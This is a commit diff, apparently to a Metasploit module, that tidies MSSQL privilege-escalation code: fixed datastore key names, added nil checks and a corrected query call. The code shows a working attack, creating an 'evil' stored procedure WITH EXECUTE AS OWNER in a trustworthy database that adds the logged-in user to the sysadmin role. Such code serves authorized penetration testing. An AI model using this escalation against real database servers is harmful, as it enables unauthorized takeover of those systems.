Do final cleanup

bug/bundler_fix
jvazquez-r7 2014-10-09 11:38:45 -05:00
parent bbe435f5c9
commit 10b160bedd
1 changed files with 8 additions and 7 deletions

View File

@ -27,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary
def run def run
# Check connection and issue initial query # Check connection and issue initial query
print_status("Attempting to connect to the database server at #{rhost}:#{rport} as #{datastore['username']}...") print_status("Attempting to connect to the database server at #{rhost}:#{rport} as #{datastore['USERNAME']}...")
if mssql_login_datastore if mssql_login_datastore
print_good('Connected.') print_good('Connected.')
else else
@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary
# Check if user has sysadmin role # Check if user has sysadmin role
if user_status == 1 if user_status == 1
print_good("#{datastore['username']} has the sysadmin role, no escalation required.") print_good("#{datastore['USERNAME']} has the sysadmin role, no escalation required.")
disconnect disconnect
return return
else else
@ -52,7 +52,7 @@ class Metasploit3 < Msf::Auxiliary
# Check for trusted databases owned by sysadmins # Check for trusted databases owned by sysadmins
print_status("Checking for trusted databases owned by sysadmins...") print_status("Checking for trusted databases owned by sysadmins...")
trust_db_list = check_trust_dbs trust_db_list = check_trust_dbs
if trust_db_list.length == 0 if trust_db_list.nil? || trust_db_list.length == 0
print_error('No databases owned by sysadmin were found flagged as trustworthy.') print_error('No databases owned by sysadmin were found flagged as trustworthy.')
disconnect disconnect
return return
@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary
# Check if the user has the db_owner role in any of the databases # Check if the user has the db_owner role in any of the databases
print_status('Checking if the user has the db_owner role in any of them...') print_status('Checking if the user has the db_owner role in any of them...')
dbowner_status = check_db_owner(trust_db_list) dbowner_status = check_db_owner(trust_db_list)
if dbowner_status == 0 if dbowner_status.nil?
print_error("Fail buckets, the user doesn't have db_owner role anywhere.") print_error("Fail buckets, the user doesn't have db_owner role anywhere.")
disconnect disconnect
return return
@ -141,7 +141,7 @@ class Metasploit3 < Msf::Auxiliary
# Parse query results # Parse query results
parse_results = result[:rows] parse_results = result[:rows]
if parse_results.any? if parse_results && parse_results.any?
print_good("- db_owner on #{db[0]} found!") print_good("- db_owner on #{db[0]} found!")
return db[0] return db[0]
end end
@ -151,6 +151,7 @@ class Metasploit3 < Msf::Auxiliary
end end
def escalate_privs(dbowner_db) def escalate_privs(dbowner_db)
print_status("#{dbowner_db}")
# Create the evil stored procedure WITH EXECUTE AS OWNER # Create the evil stored procedure WITH EXECUTE AS OWNER
evil_sql_create = "use #{dbowner_db}; evil_sql_create = "use #{dbowner_db};
DECLARE @myevil as varchar(max) DECLARE @myevil as varchar(max)
@ -159,7 +160,7 @@ class Metasploit3 < Msf::Auxiliary
WITH EXECUTE AS OWNER WITH EXECUTE AS OWNER
as as
begin begin
EXEC sp_addsrvrolemember ''#{datastore['username']}'',''sysadmin'' EXEC sp_addsrvrolemember ''#{datastore['USERNAME']}'',''sysadmin''
end'; end';
exec(@myevil); exec(@myevil);
select 1;" select 1;"
@ -170,7 +171,7 @@ class Metasploit3 < Msf::Auxiliary
DECLARE @myevil2 as varchar(max) DECLARE @myevil2 as varchar(max)
set @myevil2 = 'EXEC sp_elevate_me' set @myevil2 = 'EXEC sp_elevate_me'
exec(@myevil2);" exec(@myevil2);"
mssql_query(evil_sql_create) mssql_query(evilsql_run)
# Remove evil procedure # Remove evil procedure
evilsql_remove = "use #{dbowner_db}; evilsql_remove = "use #{dbowner_db};